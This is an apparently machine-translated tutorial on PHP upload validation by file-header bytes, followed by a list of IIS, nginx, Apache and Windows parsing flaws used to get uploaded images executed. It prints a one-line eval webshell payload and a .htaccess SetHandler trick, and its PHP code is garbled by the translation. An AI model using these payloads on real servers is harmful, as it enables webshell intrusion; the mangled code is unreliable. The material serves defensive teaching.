PHP file type Parsing vulnerability defense and attack

PHP in the processing of file uploads, often can use the following several ways to determine the type of file

1. By file name suffix, unsafe, very easy to cheat
2. By mime, some types of files can also spoof the server by modifying the file suffix name
3. By the head byte to determine the file type, but the scope of judgment is limited, such as DOCX/XLSX and other new documents, through the header information, is actually a zip package

PHP to read the file header two bytes to determine the true type of the file and its application example

function Checkfiletype ($fileName) {

$file = fopen ($fileName, "RB");
$bin = Fread ($file, 2); Read-only 2 bytes
Fclose ($file);
$strInfo = @unpack ("C2chars", $bin);//C is an unsigned integer, the net search is C, signed integer, this will produce negative judgment is not normal
$typeCode = Intval ($strInfo [' chars1 ']. $strInfo [' chars2 ']);
$fileType = ";

if ($typeCode = = 255216/*jpg*/| | $typeCode = = 7173/*gif*/| | $typeCode = = 13780/*png*/) {
return true;
}else{
return false;
}

}

function File_type ($filename) {
$file = fopen ($filename, "RB");
$bin = Fread ($file, 2); Read-only 2 bytes
Fclose ($file);
$strInfo = @unpack ("C2chars", $bin);
$typeCode = Intval ($strInfo [' chars1 ']. $strInfo [' chars2 ']);
$fileType = ";
Switch ($typeCode)
{
Case 7790:
$fileType = ' exe ';
Break
Case 7784:
$fileType = ' midi ';
Break
Case 8297:
$fileType = ' rar ';
Break
Case 255216:
$fileType = ' jpg ';
Break
Case 7173:
$fileType = ' gif ';
Break
Case 6677:
$fileType = ' bmp ';
Break
Case 13780:
$fileType = ' png ';
Break
Default
$fileType = ' unknown ';
}
return $fileType;
}

example, determine the actual type of PHP upload class:

/**
* Read file header to determine the exact type of file
*/
Class uploader{

Private $path;
Private $files;
Private $checkFunction;

/**
* @param $allow _type Accept the filter type, there are now "images" and "zip" two, you can expand
*/
function UpLoader ($allow _type) {

            $this->path = getenv (' sinasrv_cache_ DIR '). ' Zhuanqu_files/';

Switch ($allow _type) {
Case ' image ':
$this->checkfunction = ' checkifimage ';
Break
Case ' Zip ':
$this->checkfunction = ' checkifzip ';
Break
}

}

/**
* Perform upload
* @param $files parameter is $_files array
*/
Public Function Doupload ($files) {

$this->files = $files;
$func = $this->checkfunction;

if ($this->files[' files '] [' name ']! = ' && $this->files[' files ' [' error '] = = Upload_err _OK) {

$tmp _name = $this->files["Files" ["Tmp_name"];

Check file types
if ($this-> $func ($tmp _name)) {
$name = Md5_file ($tmp _name);
$name = $name. ' ___ '. $this->files["Files" ["Name"];
if (Move_uploaded_file ($tmp _name, $this->path. $name)) {
Echo ' "uploaded successfully! " ‘;
}
}
}
}

Private Function Checkifimage ($fileName) {

        $file      = fopen ($fileName, "RB");
        $bin       = Fread ($file, 2);//read-only 2 bytes
        fclose ($file);
        $strInfo = @unpack ("C2chars", $bin);
        $typeCode = intval ($strInfo [' chars1 ']. $strInfo [' chars2 ']);
        $fileType = ';

if ($typeCode = = 255216/*jpg*/| | $typeCode = = 7173/*gif*/| | $typeCode = = 13780/*png*/) {
return true;
}else{
Echo ' "only allows uploading images in jpg/gif/png format! ‘;
return false;
}
}

Private Function Checkifzip ($fileName) {

$file = fopen ($fileName, "RB");
$bin = Fread ($file, 2); Read-only 2 bytes
Fclose ($file);
$strInfo = @unpack ("C2chars", $bin);
$typeCode = Intval ($strInfo [' chars1 ']. $strInfo [' chars2 ']);
$fileType = ";

if ($typeCode = = 8075) {
return true;
}else{
Echo ' "only allows uploading files in ZIP format! "‘;
return false;
}
}

}

Picture Trojan Deception Server case

Leverage parsing vulnerabilities

One, IIS 5.x/6.0 Parsing Vulnerability
There are two ways to use IIS 6.0 parsing
1. Directory resolution
/xx.asp/xx.jpg

2. File parsing
wooyun.asp;. Jpg

First, the folder under the Web site name is. asp,. ASA, and any file extension within its directory is parsed and executed by IIS as an ASP file.

For example, if you create a directory wooyun.asp
/wooyun.asp/1.jpg

will be executed as an ASP file. Assuming that the black-wide can control the upload folder path, you can no matter when you upload your image to change the name can take the shell.
The second, under IIS6.0, is not parsed after the semicolon, which means
wooyun.asp;. Jpg

will be considered by the server as wooyun.asp and IIS6.0 default executable file in addition to the ASP also contains these three kinds of
/wooyun.asa
/wooyun.cer
/wooyun.cdx

Second, IIS 7.0/iis 7.5/nginx <8.03 Malformed Parsing vulnerability
Nginx Parsing vulnerability This great loophole is China security organization 80sec discovered ...
In the default fast-cgi, black-wide upload a name of wooyun.jpg, the content is
<? PHP fputs (fopen (' shell.php ', ' W '), ' <?php eval ($_post[cmd])?> ');? >

The file and then access wooyun.jpg/.php, in this directory will generate a word trojan shell.php

Three, Nginx <8.03 null-byte code execution vulnerability
Impact Edition: 0.5.,0.6, 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx embeds PHP code in the image and then accesses the
xxx.jpg%00.php

To execute the code within it.

Iv. Apache Parsing Vulnerability
Apache is from right to left to judge the resolution, if it is not recognized parsing, then left to judge.
For example, Wooyun.php.owf.rar ". Owf" and ". rar" are two suffixes that Apache cannot identify, and Apache interprets Wooyun.php.owf.rar as PHP.
How to determine whether the legal suffix is the key to exploit the vulnerability, test can try to upload a wooyun.php.rara.jpg.png ... (Write down the common suffixes you know ...) ) to test whether it is a valid suffix

V. Other
In a Windows environment, xx.jpg[spaces] or xx.jpg. These two types of files are not allowed to exist, if so named, Windows will default to remove spaces or points, the hacker can catch the packet, after the file name with a space or point to bypass the blacklist. If the upload succeeds, the spaces and dots will be automatically removed by Windows, which can also be getshell.
If it is in Apache. htaccess can be executed. and can be uploaded. You can try writing in. htaccess:
<filesmatch "Wooyun.jpg" > SetHandler application/x-httpd-php </FilesMatch>

Then upload shell.jpg trojan, so that shell.jpg can be parsed into PHP files

PHP file type Parsing vulnerability defense and attack